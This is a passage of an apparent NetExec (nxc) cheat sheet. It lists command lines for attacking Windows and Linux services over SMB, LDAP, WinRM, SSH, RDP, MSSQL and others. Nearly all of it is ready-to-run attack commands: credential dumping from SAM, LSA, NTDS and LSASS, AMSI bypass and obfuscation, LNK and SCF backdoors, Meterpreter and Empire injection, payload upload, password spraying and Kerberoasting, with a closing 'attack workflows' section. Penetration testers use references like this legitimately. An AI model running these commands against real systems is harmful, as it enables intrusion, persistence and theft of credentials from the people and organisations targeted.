key.pem\n```\n\n---\n\n## SMB Protocol (Port 445)\n\n### Basic Enumeration (No Auth)\n```bash\nnxc smb 192.168.1.0/24                              # Check SMB version, signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt  # Find relay targets\n```\n\n### Enumeration (With Auth)\n```bash\nnxc smb 192.168.1.10 -u user -p pass --shares              # List shares\nnxc smb 192.168.1.10 -u user -p pass --shares --filter-shares read,write  # Filter by access\nnxc smb 192.168.1.10 -u user -p pass --dir \"C$\"            # List directory contents\nnxc smb 192.168.1.10 -u user -p pass --users               # Enumerate users\nnxc smb 192.168.1.10 -u user -p pass --users --enabled     # Only enabled users\nnxc smb 192.168.1.10 -u user -p pass --users-export out.txt  # Export users to file\nnxc smb 192.168.1.10 -u user -p pass --groups              # Enumerate groups\nnxc smb 192.168.1.10 -u user -p pass --computers           # Enumerate computers\nnxc smb 192.168.1.10 -u user -p pass --local-groups        # Local groups\nnxc smb 192.168.1.10 -u user -p pass --pass-pol            # Password policy\nnxc smb 192.168.1.10 -u user -p pass --smb-sessions        # Active SMB sessions\nnxc smb 192.168.1.10 -u user -p pass --disks               # Enumerate disks\nnxc smb 192.168.1.10 -u user -p pass --interfaces          # Network interfaces\nnxc smb 192.168.1.10 -u user -p pass --loggedon-users      # Logged on users\nnxc smb 192.168.1.10 -u user -p pass --rid-brute           # RID cycling\nnxc smb 192.168.1.10 -u user -p pass --qwinsta             # RDP connections\nnxc smb 192.168.1.10 -u user -p pass --tasklist            # Running processes\n```\n\n### WMI Queries\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\" --wmi-namespace \"root\\cimv2\"\n```\n\n### Spidering Shares\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --spider C$\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --spider-folder Users\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --pattern password\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --regex \".*\\.txt$\"\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --content       # Search file content\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --depth 3       # Max recursion depth\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --only-files    # Files only\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --exclude-dirs Windows,System32\n```\n\n### Command Execution\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -x \"whoami\"                    # CMD\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable'           # PowerShell\nnxc smb 192.168.1.10 -u admin -p pass --exec-method smbexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method atexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method mmcexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --no-output -x \"command\"       # Don't retrieve output\n```\n\n### PowerShell Options\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' --obfs          # Obfuscate\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --force-ps32            # Force 32-bit\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --no-encode             # Don't encode\nnxc smb 192.168.1.10 -u admin -p pass --clear-obfscripts                   # Clear cache\n```\n\n### File Operations\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\Windows\\\\Temp\\\\file.txt\" ./local.txt\nnxc smb 192.168.1.10 -u admin -p pass --put-file ./payload.exe \"\\\\Windows\\\\Temp\\\\payload.exe\"\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\file.txt\" ./out.txt --append-host\n```\n\n### Credential Dumping\n```bash\n# SAM Database\nnxc smb 192.168.1.10 -u admin -p pass --sam                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --sam secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --sam regdump                # Using regdump\n\n# LSA Secrets\nnxc smb 192.168.1.10 -u admin -p pass --lsa                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --lsa secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --lsa regdump                # Using regdump\n\n# NTDS (Domain Controller)\nnxc smb dc01.domain.local -u admin -p pass --ntds                  # Default (drsuapi)\nnxc smb dc01.domain.local -u admin -p pass --ntds vss              # Using VSS\nnxc smb dc01.domain.local -u admin -p pass --ntds drsuapi          # Using drsuapi\nnxc smb dc01.domain.local -u admin -p pass --ntds --user admin     # Specific user\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled        # Enabled accounts only\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi                      # Dump DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies              # Include cookies\nnxc smb 192.168.1.10 -u admin -p pass --dpapi nosystem             # Exclude SYSTEM\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --mkfile masterkeys.txt\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --pvk backupkey.pvk\n\n# SCCM\nnxc smb 192.168.1.10 -u admin -p pass --sccm                       # Default (wmi)\nnxc smb 192.168.1.10 -u admin -p pass --sccm wmi                   # Using WMI\nnxc smb 192.168.1.10 -u admin -p pass --sccm disk                  # Using disk\n```\n\n### SMB Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\n# Vulnerability Checks\nnxc smb 192.168.1.10 -u user -p pass -M ms17-010                   # EternalBlue\nnxc smb 192.168.1.10 -u user -p pass -M zerologon                  # CVE-2020-1472\nnxc smb 192.168.1.10 -u user -p pass -M nopac                      # CVE-2021-42278/42287\nnxc smb 192.168.1.10 -u user -p pass -M printnightmare             # PrintNightmare\nnxc smb 192.168.1.10 -u user -p pass -M remove-mic                 # CVE-2019-1040\nnxc smb 192.168.1.10 -u user -p pass -M smbghost                   # CVE-2020-0796\nnxc smb 192.168.1.10 -u user -p pass -M coerce_plus                # Coercion vulns\nnxc smb 192.168.1.10 -u user -p pass -M timeroast                  # Timeroasting\n\n# Enumeration\nnxc smb 192.168.1.10 -u user -p pass -M enum_av                    # AV products\nnxc smb 192.168.1.10 -u user -p pass -M enum_ca                    # ADCS CAs\nnxc smb 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc smb 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc smb 192.168.1.10 -u user -p pass -M webdav                     # WebClient service\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus                # Spider shares\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus -o READ_ONLY=false\n\n# Password Hunting\nnxc smb 192.168.1.10 -u user -p pass -M gpp_password               # GPP passwords\nnxc smb 192.168.1.10 -u user -p pass -M gpp_autologin              # GPP autologin\n\n# Backdoors\nnxc smb 192.168.1.10 -u user -p pass -M drop-sc                    # Drop searchConnector\nnxc smb 192.168.1.10 -u user -p pass -M scuffy                     # Drop .scf files\nnxc smb 192.168.1.10 -u user -p pass -M slinky                     # Create LNK backdoors\n\n# Computer Management\nnxc smb 192.168.1.10 -u user -p pass -M add-computer               # Add/delete computer\nnxc smb 192.168.1.10 -u user -p pass -M backup_operator            # Backup operator exploit\n```\n\n#### HIGH PRIVILEGE MODULES (requires admin)\n```bash\n# Credential Dumping\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy                    # LSASS dump\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump                  # Alternative LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M procdump                  # Process dump\nnxc smb 192.168.1.10 -u admin -p pass -M handlekatz                # Handle dump\nnxc smb 192.168.1.10 -u admin -p pass -M dpapi_hash                # DPAPI masterkeys\nnxc smb 192.168.1.10 -u admin -p pass -M hash_spider               # Recursive LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M ntdsutil                  # NTDS with ntdsutil\n\n# Application Credentials\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover          # Find KeePass\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_trigger           # KeePass trigger\nnxc smb 192.168.1.10 -u admin -p pass -M mobaxterm                 # MobaXterm creds\nnxc smb 192.168.1.10 -u admin -p pass -M mremoteng                 # mRemoteNG creds\nnxc smb 192.168.1.10 -u admin -p pass -M putty                     # PuTTY keys\nnxc smb 192.168.1.10 -u admin -p pass -M rdcman                    # RDCMan creds\nnxc smb 192.168.1.10 -u admin -p pass -M winscp                    # WinSCP creds\nnxc smb 192.168.1.10 -u admin -p pass -M vnc                       # VNC passwords\nnxc smb 192.168.1.10 -u admin -p pass -M wifi                      # WiFi passwords\nnxc smb 192.168.1.10 -u admin -p pass -M veeam                     # Veeam DB creds\nnxc smb 192.168.1.10 -u admin -p pass -M msol                      # Azure AD Connect\nnxc smb 192.168.1.10 -u admin -p pass -M teams_localdb             # Teams SSO cookie\nnxc smb 192.168.1.10 -u admin -p pass -M wam                       # Token Broker Cache\n\n# Enumeration\nnxc smb 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records (WMI)\nnxc smb 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc smb 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc smb 192.168.1.10 -u admin -p pass -M hyperv-host               # HyperV host\nnxc smb 192.168.1.10 -u admin -p pass -M iis                       # IIS app pool creds\nnxc smb 192.168.1.10 -u admin -p pass -M install_elevated          # AlwaysInstallElevated\nnxc smb 192.168.1.10 -u admin -p pass -M ntlmv1                    # NTLMv1 enabled\nnxc smb 192.168.1.10 -u admin -p pass -M runasppl                  # RunAsPPL status\nnxc smb 192.168.1.10 -u admin -p pass -M uac                       # UAC status\nnxc smb 192.168.1.10 -u admin -p pass -M wcc                       # Security config\nnxc smb 192.168.1.10 -u admin -p pass -M security-questions        # Security Q&A\n\n# File Operations\nnxc smb 192.168.1.10 -u admin -p pass -M notepad++                 # Unsaved files\nnxc smb 192.168.1.10 -u admin -p pass -M powershell_history        # PS history\nnxc smb 192.168.1.10 -u admin -p pass -M recent_files              # Recent files\nnxc smb 192.168.1.10 -u admin -p pass -M snipped                   # Snipping Tool\n\n# Persistence & Execution\nnxc smb 192.168.1.10 -u admin -p pass -M empire_exec               # Empire agent\nnxc smb 192.168.1.10 -u admin -p pass -M met_inject                # Meterpreter\nnxc smb 192.168.1.10 -u admin -p pass -M web_delivery              # Web delivery\nnxc smb 192.168.1.10 -u admin -p pass -M impersonate               # Token impersonation\nnxc smb 192.168.1.10 -u admin -p pass -M pi                        # Process injection\nnxc smb 192.168.1.10 -u admin -p pass -M schtask_as                # Scheduled task\n\n# Configuration Changes\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M shadowrdp                 # Shadow RDP\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable  # Enable WDigest\nnxc smb 192.168.1.10 -u admin -p pass -M remote-uac                # Remote UAC\n\n# Registry Operations\nnxc smb 192.168.1.10 -u admin -p pass -M reg-query                 # Registry query\nnxc smb 192.168.1.10 -u admin -p pass -M reg-winlogon              # Winlogon creds\n\n# Utility\nnxc smb 192.168.1.10 -u admin -p pass -M test_connection           # Test connectivity\n```\n\n---\n\n## LDAP Protocol (Port 389/636)\n\n### Basic Enumeration\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users           # Enumerate all users\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users user123   # Specific user\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users-export out.txt\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups          # Enumerate all groups\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups \"Domain Admins\"\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --computers       # Enumerate computers\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --dc-list         # List DCs\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --get-sid         # Get domain SID\n```\n\n### Advanced Queries\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --admin-count               # adminCount=1 users\nnxc ldap 192.168.1.10 -u user -p pass --trusted-for-delegation    # Trusted delegation\nnxc ldap 192.168.1.10 -u user -p pass --password-not-required     # Empty passwords allowed\nnxc ldap 192.168.1.10 -u user -p pass --active-users              # Active accounts only\nnxc ldap 192.168.1.10 -u user -p pass --find-delegation           # Delegation relationships\n\n# GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa                       # Enumerate GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-convert-id gmsa_name\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-decrypt-lsa lsa_data\n\n# Custom LDAP Query\nnxc ldap 192.168.1.10 -u user -p pass --query \"(objectClass=user)\" \"cn,sAMAccountName\"\nnxc ldap 192.168.1.10 -u user -p pass --base-dn \"OU=Users,DC=domain,DC=local\"\n```\n\n### Kerberoasting & ASREPRoasting\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --kerberoasting output.txt\nnxc ldap 192.168.1.10 -u user -p pass --asreproast output.txt\n```\n\n### Bloodhound Collection\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c All\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Default\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c DCOnly\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Session,LoggedOn\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Group,LocalAdmin,ACL\n```\n\n### LDAP Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -M adcs                      # Find ADCS/PKI\nnxc ldap 192.168.1.10 -u user -p pass -M daclread                  # Read DACLs\nnxc ldap 192.168.1.10 -u user -p pass -M enum_trusts               # Trust relationships\nnxc ldap 192.168.1.10 -u user -p pass -M find-computer             # Find computers\nnxc ldap 192.168.1.10 -u user -p pass -M get-desc-users            # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M get-network               # DNS records/IPs\nnxc ldap 192.168.1.10 -u user -p pass -M get-unixUserPassword      # Unix passwords\nnxc ldap 192.168.1.10 -u user -p pass -M get-userPassword          # User passwords\nnxc ldap 192.168.1.10 -u user -p pass -M groupmembership           # User group membership\nnxc ldap 192.168.1.10 -u user -p pass -M laps                      # LAPS passwords\nnxc ldap 192.168.1.10 -u user -p pass -M ldap-checker              # LDAP signing/binding\nnxc ldap 192.168.1.10 -u user -p pass -M maq                       # MachineAccountQuota\nnxc ldap 192.168.1.10 -u user -p pass -M obsolete                  # Obsolete OS\nnxc ldap 192.168.1.10 -u user -p pass -M pre2k                     # Pre-created accounts\nnxc ldap 192.168.1.10 -u user -p pass -M pso                       # Password policies\nnxc ldap 192.168.1.10 -u user -p pass -M sccm                      # SCCM infrastructure\nnxc ldap 192.168.1.10 -u user -p pass -M subnets                   # Sites and subnets\nnxc ldap 192.168.1.10 -u user -p pass -M user-desc                 # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M whoami                    # Current user details\n```\n\n---\n\n## WinRM Protocol (Port 5985/5986)\n\n### Basic Usage\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -H \nnxc winrm 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc winrm 192.168.1.10 -u admin -p pass --local-auth\nnxc winrm 192.168.1.10 -u admin -p pass --laps                     # LAPS auth\n```\n\n### Port Configuration\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985                # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5986                # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 5986           # Both ports\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http         # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto https        # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http https   # Both protocols\nnxc winrm 192.168.1.10 -u admin -p pass --http-timeout 15          # Timeout\n```\n\n### Command Execution\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc winrm 192.168.1.10 -u admin -p pass -X '$PSVersionTable'\nnxc winrm 192.168.1.10 -u admin -p pass -x \"ipconfig /all\"\nnxc winrm 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### Credential Dumping\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --sam                      # Dump SAM\nnxc winrm 192.168.1.10 -u admin -p pass --lsa                      # Dump LSA\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method cmd          # Using cmd\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method powershell   # Using PowerShell\n```\n\n### WinRM Modules\n```bash\n# No modules available for WinRM protocol in current version\n```\n\n---\n\n## SSH Protocol (Port 22)\n\n### Authentication\n```bash\nnxc ssh 192.168.1.10 -u root -p password\nnxc ssh 192.168.1.10 -u root -p passwords.txt\nnxc ssh 192.168.1.10 -u root --key-file id_rsa\nnxc ssh 192.168.1.10 -u root --key-file id_rsa -p passphrase\nnxc ssh 192.168.1.10 -u users.txt -p passwords.txt\nnxc ssh 192.168.1.10 -u root -p pass --port 2222\nnxc ssh 192.168.1.10 -u root -p pass --ssh-timeout 20\n```\n\n### Command Execution\n```bash\nnxc ssh 192.168.1.10 -u root -p pass -x \"cat /etc/passwd\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"uname -a\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"id\"\nnxc ssh 192.168.1.10 -u root -p pass --no-output -x \"command\"\n```\n\n### Sudo Operations\n```bash\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check                  # Check sudo privs\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method sudo-stdin\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method mkfifo\nnxc ssh 192.168.1.10 -u user -p pass --get-output-tries 10\n```\n\n### File Operations\n```bash\nnxc ssh 192.168.1.10 -u root -p pass --put-file local.txt /tmp/remote.txt\nnxc ssh 192.168.1.10 -u root -p pass --get-file /etc/passwd ./passwd.txt\n```\n\n### SSH Modules\n```bash\n# No modules available for SSH protocol in current version\n```\n\n---\n\n## RDP Protocol (Port 3389)\n\n### Check Access\n```bash\nnxc rdp 192.168.1.10 -u admin -p password\nnxc rdp 192.168.1.10 -u admin -H \nnxc rdp 192.168.1.10 -u users.txt -p passwords.txt -d DOMAIN\nnxc rdp 192.168.1.10 -u admin -p pass --local-auth\nnxc rdp 192.168.1.10 -u admin -p pass --port 3390\nnxc rdp 192.168.1.10 -u admin -p pass --rdp-timeout 10\n```\n\n### Screenshots\n```bash\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --screentime 10\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --res 1920x1080\nnxc rdp 192.168.1.10 -u admin -p pass --nla-screenshot             # If NLA disabled\n```\n\n### RDP Modules\n```bash\n# No modules available for RDP protocol in current version\n```\n\n---\n\n## MSSQL Protocol (Port 1433)\n\n### Authentication\n```bash\nnxc mssql 192.168.1.10 -u sa -p password\nnxc mssql 192.168.1.10 -u sa -p password --local-auth\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN -k              # Kerberos\nnxc mssql 192.168.1.10 -u sa -H \nnxc mssql 192.168.1.10 -u sa -p pass --port 1434\nnxc mssql 192.168.1.10 -u sa -p pass --mssql-timeout 10\n```\n\n### Queries\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT @@version\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.databases\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.server_principals\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"EXEC sp_helprotect\"\n```\n\n### Command Execution\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -x \"whoami\"                 # via xp_cmdshell\nnxc mssql 192.168.1.10 -u sa -p pass -X 'Get-Host'               # PowerShell\nnxc mssql 192.168.1.10 -u sa -p pass --no-output -x \"command\"\n```\n\n### PowerShell Options\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --force-ps32\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --obfs\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --no-encode\nnxc mssql 192.168.1.10 -u sa -p pass --clear-obfscripts\n```\n\n### File Operations\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --put-file local.txt C:\\\\Temp\\\\remote.txt\nnxc mssql 192.168.1.10 -u sa -p pass --get-file C:\\\\Temp\\\\file.txt ./local.txt\n```\n\n### Enumeration\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute                  # RID bruteforce\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute 5000\n```\n\n### MSSQL Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u user -p pass -M enum_impersonate        # Impersonation privs\nnxc mssql 192.168.1.10 -u user -p pass -M enum_logins             # SQL logins\nnxc mssql 192.168.1.10 -u user -p pass -M exec_on_link            # Execute on linked server\nnxc mssql 192.168.1.10 -u user -p pass -M link_enable_xp          # Enable xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M link_xpcmd              # Run xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_coerce            # Execute arbitrary SQL\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_priv              # Enumerate/exploit privs\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -M empire_exec               # Empire agent\nnxc mssql 192.168.1.10 -u sa -p pass -M enum_links                # Enumerate linked servers\nnxc mssql 192.168.1.10 -u sa -p pass -M met_inject                # Meterpreter injection\nnxc mssql 192.168.1.10 -u sa -p pass -M nanodump                  # LSASS dump\nnxc mssql 192.168.1.10 -u sa -p pass -M test_connection           # Test connectivity\nnxc mssql 192.168.1.10 -u sa -p pass -M web_delivery              # Web delivery\n```\n\n---\n\n## FTP Protocol (Port 21)\n\n### Authentication\n```bash\nnxc ftp 192.168.1.10 -u admin -p password\nnxc ftp 192.168.1.10 -u anonymous -p ''\nnxc ftp 192.168.1.10 -u users.txt -p passwords.txt\nnxc ftp 192.168.1.10 -u admin -p pass --port 2121\n```\n\n### File Operations\n```bash\nnxc ftp 192.168.1.10 -u admin -p pass --ls                        # List root\nnxc ftp 192.168.1.10 -u admin -p pass --ls /var/www\nnxc ftp 192.168.1.10 -u admin -p pass --get file.txt\nnxc ftp 192.168.1.10 -u admin -p pass --put local.txt remote.txt\n```\n\n### FTP Modules\n```bash\n# No modules available for FTP protocol in current version\n```\n\n---\n\n## VNC Protocol (Port 5900)\n\n### Authentication\n```bash\nnxc vnc 192.168.1.10 -u admin -p password\nnxc vnc 192.168.1.10 -u admin -p passwords.txt\nnxc vnc 192.168.1.10 -u admin -p pass --port 5901\nnxc vnc 192.168.1.10 -u admin -p pass --vnc-sleep 5               # Rate limiting\n```\n\n### Screenshot\n```bash\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot --screentime 5\n```\n\n### VNC Modules\n```bash\n# No modules available for VNC protocol in current version\n```\n\n---\n\n## NFS Protocol (Port 111)\n\n### Enumeration\n```bash\nnxc nfs 192.168.1.10                                               # Basic enumeration\nnxc nfs 192.168.1.10 --shares                                      # List shares\nnxc nfs 192.168.1.10 --enum-shares                                 # Enumerate shares (depth 3)\nnxc nfs 192.168.1.10 --enum-shares 5                               # Custom depth\nnxc nfs 192.168.1.10 --port 2049\nnxc nfs 192.168.1.10 --nfs-timeout 10\n```\n\n### Share Operations\n```bash\nnxc nfs 192.168.1.10 --share /export --ls                          # List share root\nnxc nfs 192.168.1.10 --share /export --ls /path/to/dir\nnxc nfs 192.168.1.10 --share /export --get-file remote.txt local.txt\nnxc nfs 192.168.1.10 --share /export --put-file local.txt remote.txt\n```\n\n### NFS Modules\n```bash\n# No modules available for NFS protocol in current version\n```\n\n---\n\n## WMI Protocol (Port 135)\n\n### Basic Usage\n```bash\nnxc wmi 192.168.1.10 -u admin -p password\nnxc wmi 192.168.1.10 -u admin -H \nnxc wmi 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc wmi 192.168.1.10 -u admin -p pass --local-auth\nnxc wmi 192.168.1.10 -u admin -p pass --rpc-timeout 5\n```\n\n### WMI Queries\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_ComputerSystem\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi-namespace \"root\\cimv2\"\n```\n\n### Command Execution\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec-event -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-timeout 10\nnxc wmi 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### WMI Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc wmi 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc wmi 192.168.1.10 -u user -p pass -M zerologon                  # Zerologon check\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc wmi 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records\nnxc wmi 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\n```\n\n---\n\n## General Flags & Options\n\n### Threading & Performance\n```bash\n-t 256                       # Number of threads (default: 256)\n--timeout 10                 # Connection timeout in seconds\n--jitter 5                   # Random delay between requests (seconds)\n```\n\n### Output & Logging\n```bash\n--verbose                    # Verbose output\n--debug                      # Debug mode\n--log output.log             # Save output to file\n--no-progress                # Disable progress bar\n```\n\n### DNS Options\n```bash\n-6                           # Force IPv6\n--dns-server 8.8.8.8         # Custom DNS server\n--dns-tcp                    # Use TCP for DNS queries\n--dns-timeout 3              # DNS timeout in seconds\n```\n\n### Credential Database\n```bash\n-id 1                        # Use credential ID from database\n-id 1 2 3                    # Use multiple credential IDs\n```\n\n### Server Options\n```bash\n--server https               # Use HTTPS server (default)\n--server http                # Use HTTP server\n--server-host 0.0.0.0        # Bind server to IP\n--server-port 8000           # Server port\n--connectback-host IP        # Connectback IP for remote system\n```\n\n### Database\n```bash\ncmedb                        # Access NXC database\nexport smb                   # Export SMB results\n```\n\n### Modules\n```bash\nnxc smb -L                              # List all SMB modules\nnxc smb -M  --options           # Show module options\n```\n\n---\n\n## Common Attack Workflows\n\n### 1. Initial Enumeration\n```bash\n# Find hosts and check SMB signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt\n\n# Anonymous/Guest enumeration\nnxc smb 192.168.1.0/24 -u '' -p ''\nnxc smb 192.168.1.0/24 -u 'guest' -p ''\n\n# Check multiple protocols\nnxc smb 192.168.1.0/24\nnxc rdp 192.168.1.0/24 -u '' -p ''\nnxc winrm 192.168.1.0/24 -u '' -p ''\n```\n\n### 2. Password Spraying\n```bash\n# Single password spray (safe)\nnxc smb targets.txt -u users.txt -p 'Winter2024!' -d DOMAIN --continue-on-success\n\n# With fail limits\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 --fail-limit 5\n\n# Check valid creds across multiple protocols\nnxc smb 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc mssql 192.168.1.10 -u admin -p pass\nnxc rdp 192.168.1.10 -u admin -p pass\n```\n\n### 3. Credential Dumping\n```bash\n# Local SAM\nnxc smb 192.168.1.10 -u admin -p pass --sam\n\n# LSASS memory\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump\n\n# Domain Controller NTDS\nnxc smb dc01.domain.local -u admin -p pass --ntds\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies\n```\n\n### 4. Domain Enumeration\n```bash\n# Users and groups\nnxc ldap dc01.domain.local -u user -p pass --users --groups\n\n# Kerberoastable accounts\nnxc ldap dc01.domain.local -u user -p pass --kerberoasting kerberoast.txt\n\n# ASREProastable accounts\nnxc ldap dc01.domain.local -u user -p pass --asreproast asrep.txt\n\n# Bloodhound data\nnxc ldap dc01.domain.local -u user -p pass --bloodhound -c All\n\n# Find vulnerabilities\nnxc ldap dc01.domain.local -u user 